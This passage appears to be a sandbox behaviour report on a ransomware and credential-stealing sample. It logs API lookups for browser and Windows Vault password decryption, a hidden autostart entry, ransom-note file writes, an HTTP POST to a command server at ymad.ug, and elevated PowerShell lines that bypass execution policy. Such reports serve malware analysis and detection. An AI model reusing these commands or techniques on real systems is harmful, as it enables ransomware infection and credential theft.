Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Get Address c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll function = InitializeConditionVariable, address_out = 0x77168456 True 1
Fn
Get Address c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll function = SleepConditionVariableCS, address_out = 0x76cb4b32 True 1
Fn
Get Address c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll function = WakeAllConditionVariable, address_out = 0x7719409d True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = sqlite3_open, address_out = 0x73ae49c9 True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = sqlite3_close, address_out = 0x73ae3341 True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = sqlite3_prepare_v2, address_out = 0x73acd529 True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = sqlite3_step, address_out = 0x73aacfda True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = sqlite3_column_text, address_out = 0x73aad453 True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = sqlite3_column_bytes, address_out = 0x73aad37e True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = sqlite3_finalize, address_out = 0x73aac7d3 True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = NSS_Init, address_out = 0x73b20391 True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = PK11_GetInternalKeySlot, address_out = 0x73b448fe True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = PK11_Authenticate, address_out = 0x73b2d0d8 True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = PK11SDR_Decrypt, address_out = 0x73b4089d True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = NSS_Shutdown, address_out = 0x73b2061c True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = PK11_FreeSlot, address_out = 0x73b44370 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadDescription, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromString, address_out = 0x755fe599 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultOpenVault, address_out = 0x735026a9 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultEnumerateItems, address_out = 0x73503099 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultGetItem, address_out = 0x73503242 True 1
Fn
User (3)
»
Operation Additional Information Success Count Logfile
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 3
Fn
Keyboard (1)
»
Operation Additional Information Success Count Logfile
Get Info type = 0, result_out = 4 True 1
Fn
System (170)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 3
Fn
Get Time type = System Time, time = 2019-03-24 16:36:38 (UTC) True 1
Fn
Get Time type = Ticks, time = 121462 True 1
Fn
Get Time type = Performance Ctr, time = 18375974385 True 1
Fn
Get Time type = Local Time, time = 2019-03-25 03:36:38 (Local Time) True 135
Fn
Get Time type = Performance Ctr, time = 19042016873 True 1
Fn
Get Time type = Performance Ctr, time = 19042027985 True 1
Fn
Get Time type = Performance Ctr, time = 19042039154 True 1
Fn
Get Time type = Performance Ctr, time = 19042050141 True 1
Fn
Get Time type = Performance Ctr, time = 19042060963 True 1
Fn
Get Time type = Performance Ctr, time = 19042071525 True 1
Fn
Get Time type = Performance Ctr, time = 19042082397 True 1
Fn
Get Time type = Performance Ctr, time = 19042093322 True 1
Fn
Get Time type = Performance Ctr, time = 19042104141 True 1
Fn
Get Time type = Performance Ctr, time = 19042114720 True 1
Fn
Get Time type = Performance Ctr, time = 19042125440 True 1
Fn
Get Time type = Performance Ctr, time = 19042135778 True 1
Fn
Get Time type = Performance Ctr, time = 19042146153 True 1
Fn
Get Time type = Performance Ctr, time = 19042156717 True 1
Fn
Get Time type = Performance Ctr, time = 19042167498 True 1
Fn
Get Time type = Performance Ctr, time = 19042178398 True 1
Fn
Get Time type = Performance Ctr, time = 19042189328 True 1
Fn
Get Time type = Performance Ctr, time = 19042199927 True 1
Fn
Get Time type = Performance Ctr, time = 19042210637 True 1
Fn
Get Time type = Performance Ctr, time = 19042221395 True 1
Fn
Get Time type = Performance Ctr, time = 19042232255 True 1
Fn
Get Time type = Ticks, time = 126610 True 1
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Hardware Information True 3
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = A6CF1546B-343A2EC6-63D8DC88-FF4A8C5D-82A11F69 True 1
Fn
Environment (5)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Get Environment String name = PATH True 1
Fn
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Get Environment String name = MALLOC_OPTIONS False 1
Fn
Set Environment String name = PATH, value = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Network Behavior
HTTP Sessions (1)
»
Information Value
Total Data Sent 259 bytes
Total Data Received 4.27 MB
Contacted Host Count 1
Contacted Hosts 95.213.139.118
HTTP Session #1
»
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Server Name ymad.ug
Server Port 80
Username -
Password -
Data Sent 259 bytes
Data Received 4.27 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = ymad.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /1/index.php, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request url = ymad.ug/1/index.php True 1
Fn
Data
Read Response size = 65636, size_out = 9393 True 1
Fn
Data
Read Response size = 65636, size_out = 3464 True 1
Fn
Data
Read Response size = 65636, size_out = 908 True 1
Fn
Data
Read Response size = 65636, size_out = 65566 True 1
Fn
Data
Read Response size = 65636, size_out = 5896 True 1
Fn
Data
Read Response size = 65636, size_out = 16044 True 1
Fn
Data
Read Response size = 65636, size_out = 5537 True 1
Fn
Data
Read Response size = 65636, size_out = 32120 True 1
Fn
Data
Read Response size = 65636, size_out = 8760 True 1
Fn
Data
Read Response size = 65636, size_out = 3472 True 1
Fn
Data
Read Response size = 65636, size_out = 12588 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 2
Fn
Data
Read Response size = 65636, size_out = 36628 True 1
Fn
Data
Read Response size = 65636, size_out = 32120 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 65589 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 27900 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65596 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 16300 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65557 True 1
Fn
Data
Read Response size = 65636, size_out = 65573 True 1
Fn
Data
Read Response size = 65636, size_out = 42484 True 1
Fn
Data
Read Response size = 65636, size_out = 14592 True 1
Fn
Data
Read Response size = 65636, size_out = 65557 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 64353 True 1
Fn
Data
Read Response size = 65636, size_out = 65573 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 2
Fn
Data
Read Response size = 65636, size_out = 57068 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 17561 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 65557 True 1
Fn
Data
Read Response size = 65636, size_out = 46801 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 46729 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 17632 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 55488 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 8872 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 3
Fn
Data
Read Response size = 65636, size_out = 61448 True 1
Fn
Data
Read Response size = 65636, size_out = 3464 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 2
Fn
Data
Read Response size = 65636, size_out = 65557 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65558 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 2
Fn
Data
Read Response size = 65636, size_out = 65557 True 1
Fn
Data
Read Response size = 65636, size_out = 65573 True 1
Fn
Data
Read Response size = 65636, size_out = 39532 True 1
Fn
Data
Read Response size = 65636, size_out = 3464 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65573 True 1
Fn
Data
Read Response size = 65636, size_out = 65564 True 1
Fn
Data
Read Response size = 65636, size_out = 65596 True 1
Fn
Data
Read Response size = 65636, size_out = 65604 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 4808 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65550 True 1
Fn
Data
Read Response size = 65636, size_out = 11020 True 1
Fn
Data
Read Response size = 65636, size_out = 65564 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 2
Fn
Data
Read Response size = 65636, size_out = 29851 True 1
Fn
Data
Read Response size = 65636, size_out = 0 True 1
Fn
Close Session - True 1
Fn
Process #13: powershell.exe
0 0
»
Information Value
ID #13
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\
Monitor Start Time: 00:01:03, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:14
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xa4c
Parent PID 0xa0c (c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A50
0x A94
0x A98
0x A9C
0x AA0
0x AA4
Process #14: powershell.exe
0 0
»
Information Value
ID #14
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1""' -Verb RunAs}"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\
Monitor Start Time: 00:01:15, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:01
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xb04
Parent PID 0xa0c (c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x B10
0x B08
Process #16: killeryuga.exe
1373 4
»
Information Value
ID #16
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:56, Reason: Autostart
Unmonitor End Time: 00:03:19, Reason: Self Terminated
Monitor Duration 00:00:23
OS Process Information
»
Information Value
PID 0x780
Parent PID 0x6f8 (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 784
0x 7CC
0x 4BC
0x 4F0
0x 4F4
0x 4A8
0x 4B0
0x 494
0x 498
0x 4B4
0x 4E8
0x 5B0
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Marked Writable - 32-bit - False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00407C6C, 0x004035D8 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
...
buffer 0x00904260 0x00943193 Marked Executable - 32-bit - False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00421FDE, 0x0040D690, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041A448 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042A000 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004135F0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040C4E0 False
...
Host Behavior
File (12)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Config.Msi\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE False 1
Fn
Create C:\Recovery\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE False 1
Fn
Create C:\System Volume Information\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE False 1
Fn
Create C:\Boot\BCD.LOG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Write - size = 48 False 1
Fn
Write - size = 2 False 1
Fn
Registry (2)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Process (190)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe os_pid = 0x588, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe os_pid = 0x5a4, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Enumerate Processes - - True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\sppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\userinit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 29
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 57
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = SYNCHRONIZE True 54
Fn
Module (555)
»
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x75350000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76f50000 True 2
Fn
Load GDI32.dll base_address = 0x76a80000 True 1
Fn
Load ole32.dll base_address = 0x75bd0000 True 2
Fn
Load SHELL32.dll base_address = 0x75e30000 True 2
Fn
Load USER32.dll base_address = 0x75470000 True 2
Fn
Load kernel32.dll base_address = 0x75350000 True 2
Fn
Load RPCRT4.dll base_address = 0x759b0000 True 1
Fn
Load MPR.dll base_address = 0x750f0000 True 1
Fn
Load WININET.dll base_address = 0x75d30000 True 1
Fn
Load WINMM.dll base_address = 0x750b0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x77020000 True 1
Fn
Load KERNEL32.dll base_address = 0x75350000 True 1
Fn
Load OLEAUT32.dll base_address = 0x76b50000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x75090000 True 1
Fn
Load WS2_32.dll base_address = 0x76b10000 True 1
Fn
Load DNSAPI.dll base_address = 0x75030000 True 1
Fn
Load CRYPT32.dll base_address = 0x751a0000 True 1
Fn
Load msvcr100.dll base_address = 0x74f70000 True 1
Fn
Load Psapi.dll base_address = 0x75460000 True 1
Fn
Load Shell32.dll base_address = 0x75e30000 True 44
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75350000 True 16
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringA, address_out = 0x75363c5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x7536465a True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x7536469b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x75361410 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x753653c6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x75363c42 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x75363bca True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesA, address_out = 0x7538287b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x7537d5e5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x75363da5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatA, address_out = 0x7538a959 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatA, address_out = 0x7538a842 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x75361946 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeA, address_out = 0x75388266 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFileEx, address_out = 0x753e45ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x753e4691 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FillConsoleOutputAttribute, address_out = 0x754071e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75361245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetCommMask, address_out = 0x753e7198 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TransmitCommChar, address_out = 0x753e75fe True 1
Fn
